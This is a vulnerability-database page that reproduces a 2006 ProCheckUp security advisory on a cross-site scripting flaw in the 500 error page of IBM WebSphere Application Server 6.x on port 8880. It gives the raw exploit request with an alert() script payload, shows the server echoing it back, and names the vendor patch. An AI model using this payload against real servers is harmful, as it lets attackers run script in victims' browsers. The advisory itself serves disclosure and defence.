Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

IBMWAS-XSS.txt

🗓️ 07 Nov 2006 00:00:00Reported by Nuri FattahType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Cross Site Scripting Vulnerability in IBM WebSphere Ap

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Title: Cross Site Scripting (XSS) Vulnerability in IBM WebSphere   
Application Server  
  
ProCheckUp Security Bulletin  
  
Description: IBM WebSphere Application Server is vulnerable to Cross   
Site Scripting through a 'faultfactor' tag in the 500 Internal Server   
Error page on port 8880 (default SOAP port).  
  
Date found: 2005-02-27  
  
Vulnerable: This has been tested on WebSphere Application Server version   
6.x. Other versions may be vulnerable but this has not been verified.  
  
Severity: Medium  
  
Author: Nuri Fattah [[email protected]]  
  
Vendor Status:  
  
CVE Candidate: Not Assigned  
  
Description:  
  
WebSphere Application Server is vulnerable to a Cross Site Scripting   
attack through the Internal Server Error page used on port 8880 of the   
default WebSphere installation. This may allow the execution of   
malicious script code in the browser of an individual who clicks on a   
link to a site using the vulnerable version of WebSphere.  
  
Information:  
  
REQUEST:  
  
GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1  
Host: 192.168.1.195:8880  
Connection: close  
  
  
RESULTS:  
  
HTTP/1.1 500 Internal Server Error  
Server: WebSphere Application Server/6.0  
Content-Type: text/xml; charset=utf-8  
Content-Length: 3013  
Connection: close  
  
<?xml version='1.0' encoding='UTF-8'?>  
<SOAP-ENV:Envelope   
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"   
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"   
xmlns:xsd="http://www.w3.org/2001/XMLSchema">  
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="6.0.0.1"   
ns0:JMXMessageVersion="1.0.0" ns0:JMXVersion="1.2.0">  
</SOAP-ENV:Header>  
<SOAP-ENV:Body>  
<SOAP-ENV:Fault>  
  
[output omitted]  
  
<faultactor>/<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT></faultactor>  
</SOAP-ENV:Fault>  
  
</SOAP-ENV:Body>  
</SOAP-ENV:Envelope>  
  
Consequences:  
  
An attacker could cause the execution of malicious script code in the   
client of an individual who clicks on a link to a site using the   
vulnerable version of WebSphere Application Server.   
  
Fix: IBM has released patches to address this issue. They have tracked   
this vulnerability as APAR PK16602.  
  
References: http://www.niscc.gov.uk/niscc/docs/re-20061031-00727.pdf?lang=en  
  
Legal:  
  
Copyright 2005 ProCheckUp Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the   
Internet community for the purpose of alerting them to problems, if and   
only if the Bulletin is not changed or edited in any way, is attributed   
to ProCheckUp, and provided such reproduction and/or distribution is   
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. ProCheckUp is not   
liable for any misuse of this information by any third party  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4
ibm webspherecross site scriptingvulnerabilityserver errorport 8880soapapar pk16602procheckup ltd.
21
.json
Report